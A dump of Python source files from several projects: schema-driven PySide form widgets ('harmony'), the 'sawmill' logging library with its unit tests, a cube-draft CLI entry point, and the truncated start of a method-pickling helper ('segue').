@click.option("--url", is_flag=True)
@click.argument("path", required=True, type=str)
def run(path, url):
cube_data = CubeData(draft_size=90)
if url:
cube_data.read_cube_url(path)
else:
cube_data.read_cube_csv(path)
cube_data.start_game()
if __name__ == "__main__":
run()
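# Command-line usage sketch (the exact URL format accepted by --url depends on
# CubeData.read_cube_url, which is not shown here):
#
#   python main.py my_cube.csv
#   python main.py --url <cube-list-url>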
``` |
{
"source": "4degrees/harmony",
"score": 2
} |
#### File: harmony/schema/collection.py
```python
from ..error import SchemaConflictError
class Collection(object):
'''Store registered schemas.'''
def __init__(self, schemas=None):
'''Initialise collection with *schemas*.'''
self._schemas = {}
if schemas is not None:
for schema in schemas:
self.add(schema)
def add(self, schema):
'''Add *schema*.
Raise SchemaConflictError if a schema with the same id already exists.
'''
schema_id = schema['id']
try:
self.get(schema_id)
except KeyError:
self._schemas[schema_id] = schema
else:
raise SchemaConflictError('A schema is already registered with '
'id {0}'.format(schema_id))
def remove(self, schema_id):
'''Remove a schema with *schema_id*.'''
try:
self._schemas.pop(schema_id)
except KeyError:
raise KeyError('No schema found with id {0}'.format(schema_id))
def clear(self):
'''Remove all registered schemas.'''
self._schemas.clear()
def get(self, schema_id):
'''Return schema registered with *schema_id*.
Raise KeyError if no schema with *schema_id* registered.
'''
try:
schema = self._schemas[schema_id]
except KeyError:
raise KeyError('No schema found with id {0}'.format(schema_id))
else:
return schema
def items(self):
'''Yield (id, schema) pairs.'''
for schema in self:
yield (schema['id'], schema)
def __iter__(self):
'''Iterate over registered schemas.'''
for schema_id in self._schemas:
yield self.get(schema_id)
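# Small usage sketch (the schema dicts are invented for illustration):
#
#   collection = Collection()
#   collection.add({'id': 'harmony:/user', 'type': 'object'})
#   collection.get('harmony:/user')   # -> the registered schema
#   collection.add({'id': 'harmony:/user', 'type': 'object'})   # raises SchemaConflictError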
```
#### File: harmony/ui/error_tree.py
```python
from collections import Mapping
import jsonpointer
class ErrorTree(Mapping):
'''Convert a list of error objects to a tree structure.'''
def __init__(self, errors):
'''Initialise tree from *errors* list.'''
tree = {}
for error in sorted(
errors, key=lambda item: len(list(item.path)),
reverse=True
):
branch = tree
path = list(error.path)
path.insert(0, '__root__')
if error.validator == 'required':
# Required is set one level above so have to retrieve final
# path segment.
schema_path = '/' + '/'.join(map(str, error.schema_path))
segment = jsonpointer.resolve_pointer(
error.schema, schema_path
)
path.append(segment)
for segment in path[:-1]:
branch = branch.setdefault(segment, {})
if path[-1] in branch and isinstance(branch[path[-1]], Mapping):
branch[path[-1]]['__self__'] = error.message
else:
branch[path[-1]] = error.message
self._tree = tree.get('__root__', {})
def __getitem__(self, key):
'''Return item for *key*.'''
return self._tree[key]
def __len__(self):
'''Return number of keys at root of tree.'''
return len(self._tree)
def __iter__(self):
'''Return iterator over tree.'''
return iter(self._tree)
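# Layout sketch (exact keys depend on the jsonschema error objects passed in):
# a 'required' failure for a missing 'firstname' property under 'user' would
# surface roughly as:
#
#   tree = ErrorTree(errors)
#   tree['user']['firstname']   # -> the corresponding error message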
```
#### File: ui/model/string_list.py
```python
from PySide import QtGui, QtCore
from . import HARMONY_DATA_ROLE
class StringList(QtGui.QStringListModel):
'''Manage a list of strings.'''
def data(self, index, role):
'''Return data for *role* at *index*.'''
if role == HARMONY_DATA_ROLE:
role = QtCore.Qt.DisplayRole
return super(StringList, self).data(index, role)
def match(self, start, role, value, hits=1, flags=None):
'''Return indexes that match *value* for *role*.'''
if role == HARMONY_DATA_ROLE:
role = QtCore.Qt.DisplayRole
return super(StringList, self).match(
start, role, value, hits, flags
)
```
#### File: ui/widget/base.py
```python
from PySide import QtGui, QtCore
class Widget(QtGui.QFrame):
'''Base widget.
Subclass to create widgets that reflect specific schema fragments.
'''
# Emit when value changes.
valueChanged = QtCore.Signal()
def __init__(self, title=None, description=None, required=False,
parent=None):
'''Initialise widget with *parent*.'''
super(Widget, self).__init__(parent=parent)
self._title = title
self._description = description
self._required = required
self._error = None
self._construct()
self._postConstruction()
def _construct(self):
'''Construct widget.'''
self._errorIndicator = QtGui.QLabel()
def _postConstruction(self):
'''Perform post-construction operations.'''
self.setTitle(self._title)
self.setDescription(self._description)
self.setRequired(self._required)
self.setError('')
def _emitValueChanged(self, *args, **kw):
'''Emit valueChanged signal.
Subclasses should call this to notify system that the value has changed
either programmatically or as a result of user input.
'''
self.valueChanged.emit()
def title(self):
'''Return title value as stored in widget.'''
return self._title
def setTitle(self, value):
'''Set title to *value*.'''
self._title = value
def description(self):
'''Return description value as stored in widget.'''
return self._description
def setDescription(self, value):
'''Set description to *value*.'''
self._description = value
def required(self):
'''Return current required status.'''
return self._required
def setRequired(self, value):
'''Set required status to boolean *value*.'''
self._required = value
def error(self):
'''Return current error value.'''
return self._error
def setError(self, value):
'''Set error to *value*.'''
self._error = value
if value:
self._errorIndicator.setPixmap(QtGui.QPixmap(':harmony/icon/error'))
if isinstance(value, basestring):
self._errorIndicator.setToolTip(value)
elif isinstance(value, dict):
                error = 'The following validation errors occurred:\n * '
error += '\n * '.join(sorted(value.values()))
self._errorIndicator.setToolTip(error)
else:
self._errorIndicator.setToolTip('A validation error occurred.')
else:
self._errorIndicator.setPixmap(QtGui.QPixmap(':harmony/icon/blank'))
self._errorIndicator.setToolTip('')
def value(self):
'''Return current value.
Return None if value should be considered as not set.
'''
raise NotImplementedError()
def setValue(self, value):
'''Set current *value*.'''
raise NotImplementedError()
```
#### File: ui/widget/boolean.py
```python
from PySide import QtGui
from .simple import Simple
class Boolean(Simple):
'''Boolean control.'''
def _construct(self):
'''Construct widget.'''
super(Boolean, self)._construct()
self.layout().setStretchFactor(self._control, 0)
self.layout().addStretch(1)
def _constructControl(self):
'''Return the control widget.'''
return QtGui.QCheckBox()
def _postConstruction(self):
'''Perform post-construction operations.'''
super(Boolean, self)._postConstruction()
self._control.stateChanged.connect(self._emitValueChanged)
def value(self):
'''Return current value.'''
return self._control.isChecked()
def setValue(self, value):
'''Set current *value*.'''
if value is None:
value = False
self._control.setChecked(value)
```
#### File: ui/widget/factory.py
```python
from functools import partial
from .container import Container
from .string import String
from .text import Text
from .datetime import DateTime
from .enum import Enum
from .integer import Integer
from .number import Number
from .boolean import Boolean
from .array import Array
from .filesystem_path import FilesystemPath
from ..model.templated_dictionary_list import TemplatedDictionaryList
from ..model.string_list import StringList
class Factory(object):
'''Manage constructing widgets for schemas.'''
def __init__(self, session):
'''Initialise factory with *session*.'''
super(Factory, self).__init__()
self.session = session
def __call__(self, schema, options=None):
'''Return an appropriate widget for *schema*.'''
schema_type = schema.get('type')
schema_title = schema.get('title')
schema_description = schema.get('description')
schema_id = schema.get('id', '')
# IDs
if schema_id == 'harmony:/user':
user_model = TemplatedDictionaryList(
'{firstname} {lastname} ({email})',
self._query_users()
)
return Enum(
user_model,
title=schema_title,
description=schema_description
)
elif schema_id.startswith('harmony:/scope'):
scope = schema_id[len('harmony:/scope/'):]
items = self._query_scopes(scope)
return Enum(
TemplatedDictionaryList('{name} ({id})', items),
title=schema_title,
description=schema_description
)
# Primitives
if schema_type == 'object':
# Construct child for each property.
children = []
properties = schema.get('properties', {})
def order(item):
'''Order item by 'order' key else by name.'''
return item[1].get('order', item[0])
required = schema.get('required')
hide = ['harmony_type']
disable = []
for name, subschema in sorted(properties.items(), key=order):
child_widget = self(subschema, options=options)
if name in required:
child_widget.setRequired(True)
if name in hide:
child_widget.setHidden(True)
if name in disable:
child_widget.setDisabled(True)
children.append({'name': name, 'widget': child_widget})
# Determine columns in layout.
columns = 1
if (schema_id in ('harmony:/user', 'harmony:/resolution')):
columns = 2
widget = Container(
title=schema_title,
description=schema_description,
children=children,
columns=columns
)
if schema_id.startswith('harmony:/domain'):
# Watch for changes to each child of the domain (assumed to be
# scope) and update other children as appropriate.
for child in widget.children:
if isinstance(child['widget'], Enum):
child['widget'].valueChanged.connect(
partial(
self.onDomainChanged, child['widget'], widget
)
)
return widget
if schema_type == 'array':
items = schema.get('items', [])
if isinstance(items, dict):
additional_item = items
items = []
else:
additional_item = schema.get('additionalItems', None)
types = []
for subschema in items:
types.append({
'constructor': partial(self, subschema, options=options),
'value': self.session.instantiate(subschema)
})
additional_type = None
if additional_item is not None:
additional_type = {
'constructor': partial(self, additional_item,
options=options),
'value': self.session.instantiate(additional_item)
}
return Array(
title=schema_title,
description=schema_description,
types=types,
additionalType=additional_type
)
if schema_type == 'string':
if 'enum' in schema:
return Enum(
title=schema_title,
description=schema_description,
model=StringList(schema['enum'])
)
elif schema.get('format', '') == 'text':
return Text(
title=schema_title,
description=schema_description
)
elif schema.get('format', '') == 'date-time':
return DateTime(
title=schema_title,
description=schema_description
)
elif schema.get('format', '') == 'filesystem-path':
return FilesystemPath(
title=schema_title,
description=schema_description
)
else:
return String(
title=schema_title,
description=schema_description
)
if schema_type == 'integer':
return Integer(
title=schema_title,
description=schema_description,
minimum=schema.get('minimum'),
maximum=schema.get('maximum')
)
if schema_type == 'number':
return Number(
title=schema_title,
description=schema_description,
minimum=schema.get('minimum'),
maximum=schema.get('maximum')
)
if schema_type == 'boolean':
return Boolean(
title=schema_title,
description=schema_description
)
raise ValueError('No widget able to represent schema: {0}'
.format(schema))
def _query_users(self):
'''Return a list of valid users.
Subclasses should override this to query their user provider.
The return value should be a list of 'harmony:/user' instances.
'''
return []
def _query_scopes(self, scope, domain=None):
'''Return list of entries for *scope* using *domain*.
Subclasses should override this to query their scope provider.
The return value should be a list of 'harmony:/scope/*' instances.
'''
return []
def onDomainChanged(self, sender, container):
'''Update scope widgets based on domain.
*sender* is the scope widget whose value has changed.
*container* is the domain container widget that holds the scope
widgets.
'''
domain = container.value()
if domain is None:
domain = {}
children_by_name = {}
for child in container.children:
children_by_name[child['name']] = child['widget']
show = children_by_name.get('show')
scene = children_by_name.get('scene')
shot = children_by_name.get('shot')
dependants = ()
if sender == show:
dependants = ('scene', 'shot', 'asset')
elif sender == scene:
dependants = ('shot', 'asset')
elif sender == shot:
dependants = ('asset',)
for scope in dependants:
widget = children_by_name.get(scope)
if widget is not None:
widget.setModel(
TemplatedDictionaryList(
'{name} ({id})', self._query_scopes(scope, domain)
)
)
break
```
#### File: ui/widget/simple.py
```python
from .standard import Standard
class Simple(Standard):
'''Simple widget that wraps a single control.'''
def _construct(self):
'''Construct widget.'''
super(Simple, self)._construct()
self._control = self._constructControl()
self._headerLayout.insertWidget(1, self._control, stretch=1)
def _constructControl(self):
'''Return the control widget.
Subclasses should override this to return an appropriate control
widget.
'''
raise NotImplementedError()
```
#### File: ui/widget/string.py
```python
from PySide import QtGui
from .simple import Simple
class String(Simple):
'''Single line text based input.'''
def _constructControl(self):
'''Return the control widget.'''
control = QtGui.QLineEdit()
return control
def _postConstruction(self):
'''Perform post-construction operations.'''
super(String, self)._postConstruction()
self._control.textChanged.connect(self._emitValueChanged)
def value(self):
'''Return current value.'''
value = self._control.text()
value = value.strip()
if not value:
value = None
return value
def setValue(self, value):
'''Set current *value*.'''
self._control.setText(value)
```
#### File: ui/widget/text.py
```python
from PySide import QtGui, QtCore
from .string import String
class Text(String):
'''Multiple line text based input.'''
def _construct(self):
'''Construct widget.'''
super(Text, self)._construct()
self._titleLabel.setAlignment(
QtCore.Qt.AlignRight | QtCore.Qt.AlignTop
)
def _constructControl(self):
'''Return the control widget.'''
control = TextEdit()
# Default to 5 lines high.
# TODO: Make this configurable?
font_metrics = QtGui.QFontMetrics(control.font())
control.setFixedHeight((font_metrics.lineSpacing() * 5) + 10)
return control
class TextEdit(QtGui.QPlainTextEdit):
'''Text edit with support for placeholder text.'''
def __init__(self, *args, **kw):
'''Initialise text edit.'''
self._placeholderText = ''
super(TextEdit, self).__init__(*args, **kw)
self.setTabChangesFocus(True)
def placeholderText(self):
'''Return placeholder text.'''
return self._placeholderText
def setPlaceholderText(self, value):
'''Set placeholder text to *value*.'''
self._placeholderText = value
def text(self):
'''Return current text.'''
return self.toPlainText()
def setText(self, value):
'''Set text to *value*.'''
self.setPlainText(value)
def focusInEvent(self, event):
'''Handle focus in event.'''
super(TextEdit, self).focusInEvent(event)
self.viewport().update()
def focusOutEvent(self, event):
'''Handle focus out event.'''
super(TextEdit, self).focusOutEvent(event)
self.viewport().update()
def paintEvent(self, event):
'''Handle paint *event*.'''
placeholder = self.placeholderText()
if placeholder and not self.toPlainText() and not self.hasFocus():
# Display a placeholder
viewport = self.viewport()
target = viewport.rect()
palette = self.palette()
painter = QtGui.QPainter(viewport)
previous_pen = painter.pen()
color = palette.text().color()
color.setAlpha(128) # 50% of text color
painter.setPen(color)
painter.drawText(
target.adjusted(4, 4, -4, -4), # TODO: How to calculate?
QtCore.Qt.AlignLeft,
placeholder
)
painter.setPen(previous_pen)
painter.end()
super(TextEdit, self).paintEvent(event)
```
#### File: harmony/ui/worker.py
```python
import sys
from PySide import QtCore
class Worker(QtCore.QThread):
'''Perform work in a background thread.'''
def __init__(self, function, args=None, kwargs=None, parent=None):
'''Execute *function* in separate thread.
*args* should be a list of positional arguments and *kwargs* a
mapping of keyword arguments to pass to the function on execution.
Store function call as self.result. If an exception occurs
store as self.error.
Example::
try:
worker = Worker(theQuestion, [42])
worker.start()
while worker.isRunning():
app = QtGui.QApplication.instance()
app.processEvents()
if worker.error:
raise worker.error[1], None, worker.error[2]
except Exception as error:
traceback.print_exc()
QtGui.QMessageBox.critical(
None,
'Error',
'An unhandled error occurred:'
'\n{0}'.format(error)
)
'''
super(Worker, self).__init__(parent=parent)
self.function = function
self.args = args or []
self.kwargs = kwargs or {}
self.result = None
self.error = None
def run(self):
'''Execute function and store result.'''
try:
self.result = self.function(*self.args, **self.kwargs)
except Exception:
self.error = sys.exc_info()
```
#### File: test/interactive/publisher.py
```python
import sys
import time
from functools import partial
from PySide import QtGui
import harmony.session
import harmony.ui.widget.factory
import harmony.ui.error_tree
import harmony.ui.publisher
class Publisher(harmony.ui.publisher.Publisher):
'''Customised publisher.'''
def _publish(self, instance):
'''Perform publish.'''
for index in range(5):
time.sleep(1)
return instance
class Factory(harmony.ui.widget.factory.Factory):
'''Customised widget factory.'''
def __init__(self, *args, **kw):
self.project_tree = {}
for show_key in ('show_a', 'show_b'):
show = self.project_tree.setdefault(show_key, {})
scenes = show['scenes'] = {}
assets = show['assets'] = {}
for scene_key in ('sc001', 'sc002', 'sc003'):
scene = scenes[scene_key] = {}
shots = scene['shots'] = {}
for shot_key in ('001', '002', '003', '004'):
shot = shots[shot_key] = {}
shot['assets'] = {}
if show_key == 'show_a':
for asset_key in ('astronaut', 'space_station'):
assets[asset_key] = {}
elif show_key == 'show_b':
for asset_key in ('dinosaur', 'amber', 'scientist'):
assets[asset_key] = {}
super(Factory, self).__init__(*args, **kw)
def _query_users(self):
'''Return a list of valid users.'''
users = [
{'firstname': 'Martin', 'lastname': 'Pengelly-Phillips',
'email': '<EMAIL>', 'username': 'martin'},
{'firstname': 'Joe', 'lastname': 'Blogs',
'email': '<EMAIL>', 'username': 'joe'}
]
return map(partial(self.session.instantiate, 'harmony:/user'), users)
def _query_scopes(self, scope, domain=None):
'''Return list of entries for *scope* using *domain*.'''
scopes = []
if domain is None:
domain = {}
if scope == 'show':
shows = sorted(self.project_tree.keys())
for show in shows:
scopes.append({
'name': show.replace('_', ' ').title(),
'id': show
})
elif scope == 'scene':
show_id = domain.get('show', {}).get('id')
show = self.project_tree.get(show_id, {})
scenes = sorted(show.get('scenes', {}).keys())
for scene in scenes:
scopes.append({
'name': scene.replace('_', ' ').title(),
'id': scene
})
elif scope == 'shot':
show_id = domain.get('show', {}).get('id')
scene_id = domain.get('scene', {}).get('id')
show = self.project_tree.get(show_id, {})
scenes = show.get('scenes', {})
scene = scenes.get(scene_id, {})
shots = sorted(scene.get('shots', {}).keys())
for shot in shots:
scopes.append({
'name': shot.replace('_', ' ').title(),
'id': shot
})
elif scope == 'asset':
show_id = domain.get('show', {}).get('id')
scene_id = domain.get('scene', {}).get('id')
shot_id = domain.get('shot', {}).get('id')
show = self.project_tree.get(show_id, {})
scenes = show.get('scenes', {})
scene = scenes.get(scene_id, {})
shots = scene.get('shots', {})
shot = shots.get(shot_id)
if shot:
assets = shot.get('assets', {}).keys()
else:
assets = show.get('assets', {}).keys()
for asset in assets:
scopes.append({
'name': asset.replace('_', ' ').title(),
'id': asset
})
return map(
partial(
self.session.instantiate, 'harmony:/scope/{0}'.format(scope)
),
scopes
)
def main(arguments=None):
'''Interactive test of dynamic UI building from schema.'''
if arguments is None:
arguments = sys.argv
application = QtGui.QApplication(arguments)
session = harmony.session.Session()
factory = Factory(session)
dialog = Publisher(session, factory)
dialog.resize(600, 800)
dialog.show()
value = dialog.value()
value['note'] = 'Hello world!'
dialog.setValue(value)
sys.exit(application.exec_())
if __name__ == '__main__':
raise SystemExit(main())
``` |
{
"source": "4degrees/mill",
"score": 2
} |
#### File: doc/resource/configurator.py
```python
import sys
import sawmill
import sawmill.handler.stream
import sawmill.handler.email
import sawmill.handler.buffer
import sawmill.formatter.template
import sawmill.formatter.field
import sawmill.filterer.level
import sawmill.filterer.item
def configure(*args, **kw):
'''Example of how to configure logging system.'''
# Output to standard error stream.
stderr_handler = sawmill.handler.stream.Stream(sys.stderr)
stderr_formatter = sawmill.formatter.template.Template('{level}:{message}')
stderr_handler.formatter = stderr_formatter
stderr_filterer = sawmill.filterer.level.Level(min='warning', max=None)
stderr_filterer |= sawmill.filterer.item.Item('user', True)
stderr_handler.filterer = stderr_filterer
sawmill.root.handlers['stderr'] = stderr_handler
# Output to log file
log_path = '/path/to/logfile.log'
file_stream = open(log_path, 'a')
file_handler = sawmill.handler.stream.Stream(file_stream)
file_formatter = sawmill.formatter.field.Field([
'timestamp', 'level', 'name', 'message', '*'
])
file_handler.formatter = file_formatter
sawmill.root.handlers['file'] = file_handler
# Send email on errors.
email_handler = sawmill.handler.email.Email(
'Error Report',
'<EMAIL>',
'<EMAIL>'
)
def check_for_error(logs, buffer):
'''Return True if any of the recent logs was an error message.'''
for log in logs:
if log.get('level') == 'error':
return True
return False
email_buffer_handler = sawmill.handler.buffer.Buffer(
email_handler,
check_for_error,
limit=30
)
sawmill.root.handlers['email'] = email_buffer_handler
```
#### File: sawmill/configurator/classic.py
```python
import sys
import tempfile
from datetime import datetime
import sawmill
from sawmill.handler.stream import Stream
from sawmill.filterer.level import Level
from sawmill.formatter.field import Field
def configure(level='info', filepath=None, *args, **kw):
'''Configure the logging system in a classic manner.
*level* will determine the minimum level to display on stderr. *filepath*
can be used to set where the log file should be stored. It defaults to a
temporary file named after the current date and time.
'''
stderr_handler = Stream(
sys.stderr,
filterer=Level(min=level, max=None),
formatter=Field(keys=['level', 'name', 'message', 'traceback'],
template='{value}')
)
sawmill.root.handlers['stderr'] = stderr_handler
if filepath is None:
prefix = datetime.now().strftime('sawmill-%Y_%m_%d-%H_%M_%S-')
_, filepath = tempfile.mkstemp(prefix=prefix, suffix='.log')
file_descriptor = open(filepath, 'a')
file_handler = Stream(
file_descriptor,
filterer=Level(min=None, max=None),
formatter=Field(keys=['timestamp', 'level', 'name', 'message',
'traceback'])
)
sawmill.root.handlers['file'] = file_handler
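# Usage sketch: wire up stderr and file logging with a single call
# (filepath defaults to a timestamped temporary file):
#
#   from sawmill.configurator import classic
#   classic.configure(level='debug', filepath='/tmp/myapp.log')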
```
#### File: sawmill/formatter/template.py
```python
import string
from .base import Formatter
class Template(Formatter, string.Formatter):
'''Format :py:class:`logs<sawmill.log.Log>` according to a template.'''
ERROR = ('__ERROR__')
def __init__(self, template, missing_key=''):
'''Initialise formatter with *template*.
*missing_key* determines how to handle a missing key when formatting a
log. If set to :py:attr:`ERROR` then an error will be raised for any
key referenced in the template that is missing from the log. Any other
value will be used as the substitute for the missing value. The default
is an empty string.
.. note::
The template is applied once per processed log.
'''
super(Template, self).__init__()
self.template = template
self.missing_key = missing_key
def format(self, logs):
'''Return formatted data representing *logs*.'''
data = []
for log in logs:
data.append(self.vformat(self.template, (), log))
return data
def get_field(self, field_name, args, kwargs):
'''Convert and return *field_name* to an object to be formatted.
.. note::
Based on Python's string.Formatter.get_field source.
'''
first, rest = field_name._formatter_field_name_split()
try:
obj = self.get_value(first, args, kwargs)
for is_attr, index in rest:
if is_attr:
obj = getattr(obj, index)
else:
obj = obj[index]
except Exception:
if self.missing_key == self.ERROR:
raise
else:
return self.missing_key, first
return obj, first
```
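A brief sketch of the formatter above, using the `Log` mapping defined later in `source/sawmill/log.py`; the expected outputs follow directly from `format` and the default `missing_key` handling.

```python
from sawmill.log import Log
from sawmill.formatter.template import Template

formatter = Template('{level}:{message}')
print(formatter.format([Log(level='info', message='Hello')]))  # ['info:Hello']

# A missing key is replaced by an empty string by default...
print(formatter.format([Log(message='No level set')]))         # [':No level set']

# ...unless missing_key is set to Template.ERROR, in which case it raises.
strict = Template('{level}:{message}', missing_key=Template.ERROR)
```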
#### File: sawmill/logger/dynamic.py
```python
import collections
from .base import Logger
class Dynamic(Logger):
'''Dynamic logger allowing delayed computation of values.'''
def __getitem__(self, key):
'''Return value referenced by *key*.
If the value is a callable, then call it and return the result. In
addition store the computed result for future use.
'''
value = self._mapping[key]
if isinstance(value, collections.Callable):
self[key] = value = value()
return value
```
#### File: source/sawmill/log.py
```python
import copy
from collections import MutableMapping
class Log(
MutableMapping,
dict # dict is required as some third-party packages, such as pystache,
# test using isinstance against dict.
# Issue registered at https://github.com/defunkt/pystache/issues/185
):
'''Hold individual log data.'''
def __init__(self, *args, **kw):
'''Initialise log.'''
super(Log, self).__init__()
self._mapping = dict(*args, **kw)
def clone(self):
'''Return a clone of this log.
This is a mixture of shallow and deep copies where the log instance
and its attributes are shallow copied, but the actual mapping (items)
are deepcopied.
'''
log = copy.copy(self)
log._mapping = copy.deepcopy(self._mapping)
return log
def __repr__(self):
'''Return unambiguous representation.'''
return '{0}({1!r})'.format(self.__class__.__name__, self._mapping)
def __str__(self):
'''Return string representation.'''
return str(self._mapping)
def __len__(self):
'''Return number of keys.'''
return len(self._mapping)
def __iter__(self):
'''Return iterator over object.'''
return iter(self._mapping)
def __getitem__(self, key):
'''Return value referenced by *key*.'''
return self._mapping[key]
def __setitem__(self, key, value):
'''Set *key* to reference *value*.'''
self._mapping[key] = value
def __delitem__(self, key):
'''Remove *key* reference.'''
del self._mapping[key]
def __hash__(self):
'''Return hash of mapping.'''
return hash(frozenset(self._mapping.iteritems()))
```
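The `clone` docstring above is easiest to see in action: the mapping is deep copied, so mutating the clone's values leaves the original untouched.

```python
from sawmill.log import Log

original = Log(message='start', tags=['io'])
duplicate = original.clone()
duplicate['tags'].append('network')

print(original['tags'])   # ['io']
print(duplicate['tags'])  # ['io', 'network']
```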
#### File: unit/configurator/test_classic.py
```python
from contextlib import nested
from StringIO import StringIO
import mock
import sawmill
import sawmill.log
from sawmill.configurator import classic
def test_classic_configurator_with_no_options():
'''Test classic configurator when passed no options.'''
with nested(
mock.patch('sys.stderr', new_callable=StringIO),
mock.patch.dict(sawmill.root.handlers, clear=True)
) as (stderr, handlers):
assert len(sawmill.root.handlers) == 0
# Check handlers added under expected keys
classic.configure()
assert sorted(sawmill.root.handlers.keys()) == ['file', 'stderr']
# Check stderr handler
assert stderr.getvalue() == ''
log = sawmill.log.Log(message='Test configurator')
sawmill.root.handle(log)
assert stderr.getvalue() == 'Test configurator\n'
stderr.truncate(0)
log = sawmill.log.Log(message='Test configurator', level='debug')
sawmill.root.handle(log)
assert stderr.getvalue() == ''
# Check file handler
sawmill.root.handlers['file'].flush()
filepath = sawmill.root.handlers['file'].stream.name
with open(filepath, 'r') as file:
contents = file.read()
expected = (
'message=Test configurator\n'
'level=debug:message=Test configurator\n'
)
assert contents == expected
```
#### File: unit/filterer/test_item.py
```python
from sawmill.log import Log
from sawmill.filterer.item import Item
def test_missing_key_passes_when_mode_is_exclude():
'''Test log record with missing key passes when mode is exclude.'''
log = Log()
filterer = Item('name', 'sawmill.test', mode=Item.EXCLUDE)
assert filterer.filter([log]) == [log]
def test_missing_key_fails_when_mode_is_include():
'''Test log record with missing key fails when mode is include.'''
log = Log()
filterer = Item('name', 'sawmill.test', mode=Item.INCLUDE)
assert filterer.filter([log]) == []
def test_include_mode():
'''Test only logs with matching key, value pass when mode is INCLUDE.'''
filterer = Item('name', 'sawmill.test.one', mode=Item.INCLUDE)
log = Log(name='sawmill.test.one')
assert filterer.filter([log]) == [log]
log = Log(name='sawmill.test.two')
assert filterer.filter([log]) == []
def test_exclude_mode():
'''Test only logs without matching key, value pass when mode is EXCLUDE.'''
filterer = Item('name', 'sawmill.test.one', mode=Item.EXCLUDE)
log = Log(name='sawmill.test.one')
assert filterer.filter([log]) == []
log = Log(name='sawmill.test.two')
assert filterer.filter([log]) == [log]
```
#### File: unit/filterer/test_level.py
```python
import pytest
from sawmill.log import Log
from sawmill.filterer.level import Level
def pytest_funcarg__levels(request):
'''Return levels.'''
return [
'debug',
'info',
'warning',
'error'
]
def test_no_level_present(levels):
'''Test log record with no level information passes.'''
log = Log()
filterer = Level(levels=levels)
assert filterer.filter([log]) == [log]
def test_invalid_level(levels):
'''Test invalid level on log passes filter.'''
log = Log(level='invalid_level')
filterer = Level(levels=levels)
assert filterer.filter([log]) == [log]
def test_invalid_min_level(levels):
'''Test invalid min level on filterer raises ValueError.'''
log = Log(level='info')
filterer = Level(min='invalid_level', levels=levels)
with pytest.raises(ValueError):
filterer.filter([log])
def test_invalid_max_level(levels):
'''Test invalid max level on filterer raises ValueError.'''
log = Log(level='info')
filterer = Level(max='invalid_level', levels=levels)
with pytest.raises(ValueError):
filterer.filter([log])
def test_filter_below_min_level(levels):
'''Test log with level below min does not pass.'''
log = Log(level='info')
filterer = Level(min='warning', levels=levels)
assert filterer.filter([log]) == []
def test_filter_above_max_level(levels):
'''Test log with level above max does not pass.'''
log = Log(level='error')
filterer = Level(max='warning', levels=levels)
assert filterer.filter([log]) == []
def test_against_limitless_range(levels):
'''Test log passes against a limitless range.'''
log = Log(level='info')
filterer = Level(min=None, max=None, levels=levels)
assert filterer.filter([log]) == [log]
```
#### File: unit/formatter/test_email.py
```python
from email.message import Message
import pytest
from sawmill.log import Log
from sawmill.formatter.email import Email
def test_format():
'''Test formatted log result is as expected.'''
log = Log(
timestamp=123456789,
name='test.log',
message='A message',
level='info'
)
template = Email('Test', '<EMAIL>', '<EMAIL>')
data = template.format([log])
assert len(data) == 1
datum = data[0]
assert isinstance(datum, Message)
assert datum['Subject'] == 'Test'
assert datum['From'] == '<EMAIL>'
assert datum['To'] == '<EMAIL>'
assert datum.is_multipart() is True
html = datum.get_payload(1)
assert html.get_payload() == '''
<html>
<body>
<h1>Logs</h1>
<span class='info'>
123456789:test.log:A message
</span><br/>
</body>
</html>
'''
text = datum.get_payload(0)
assert text.get_payload() == '''# Logs
123456789:test.log:A message
'''
@pytest.mark.parametrize(('key', 'value'), [
('subject', 'A Test'),
('sender', '<EMAIL>'),
('recipients', '<EMAIL>')
])
def test_callable(key, value):
'''Test callable'''
kwargs = {
'subject': 'Test',
'sender': '<EMAIL>',
'recipients': '<EMAIL>'
}
kwargs[key] = lambda logs: value
template = Email(**kwargs)
log = Log()
data = template.format([log])
assert len(data) == 1
datum = data[0]
mapping = {
'subject': 'Subject',
'sender': 'From',
'recipients': 'To'
}
assert datum[mapping[key]] == value
```
#### File: unit/formatter/test_field.py
```python
import pytest
from sawmill.log import Log
from sawmill.formatter.field import Field
def test_format():
'''Test formatted log result is as expected.'''
log = Log(message='A message', level='info')
template = Field(keys=['level', 'message'])
assert template.format([log]) == ['level=info:message=A message\n']
def test_alternative_template():
'''Test configuring the template.'''
log = Log(message='A message')
template = Field(keys=['level', 'message'], template='{value}')
assert template.format([log]) == ['A message\n']
def test_alternative_separator():
'''Test configuring the separator'''
log = Log(message='A message', level='info')
template = Field(keys=['level', 'message'], item_separator=', ')
assert template.format([log]) == ['level=info, message=A message\n']
def test_missing_key_set_to_skip():
'''Test missing values skipped when missing_key set to SKIP.'''
log = Log(message='A message')
template = Field(keys=['level', 'message'], missing_key=Field.SKIP)
assert template.format([log]) == ['message=A message\n']
def test_missing_key_set_to_substitute():
'''Test missing values replaced when missing_key set to a substitute.'''
log = Log(message='A message')
template = Field(keys=['level', 'message'], missing_key='NOT_SET')
assert template.format([log]) == ['level=NOT_SET:message=A message\n']
def test_missing_key_set_to_error():
'''Test missing values raise KeyError when missing_key set to ERROR.'''
log = Log(message='A message')
template = Field(keys=['level', 'message'], missing_key=Field.ERROR)
with pytest.raises(KeyError):
template.format([log])
@pytest.mark.parametrize(('keys', 'expected'), [
(['*', 'level', 'message'], ['a=3:b=2:z=1:level=info:message=A message\n']),
(['level', '*', 'message'], ['level=info:a=3:b=2:z=1:message=A message\n']),
(['level', 'message', '*'], ['level=info:message=A message:a=3:b=2:z=1\n']),
(['*'], ['a=3:b=2:level=info:message=A message:z=1\n']),
(['*', '*'], (['a=3:b=2:level=info:message=A message:z=1:'
'a=3:b=2:level=info:message=A message:z=1\n']))
])
def test_include_remaining_keys(keys, expected):
'''Test using '*' to include remaining keys in alphabetical order.'''
log = Log(level='info', message='A message', a=3, b=2, z=1)
template = Field(keys=keys)
assert template.format([log]) == expected
``` |
{
"source": "4degrees/segue",
"score": 3
} |
#### File: segue/backend/pickle_support.py
```python
import copy_reg
import types
def pickle_method(method):
'''Pickle a method.'''
method_name = method.im_func.__name__
obj = method.im_self
cls = method.im_class
if method_name.startswith('__') and not method_name.endswith('__'):
# Handle mangled names
cls_name = cls.__name__.lstrip('_')
method_name = '_{0}{1}'.format(cls_name, method_name)
return unpickle_method, (method_name, obj, cls)
def unpickle_method(method_name, obj, cls):
'''Unpickle a method.'''
if obj and method_name in obj.__dict__:
# Handle classmethod
cls, obj = obj, None
for cls in cls.__mro__:
try:
method = cls.__dict__[method_name]
except KeyError:
pass
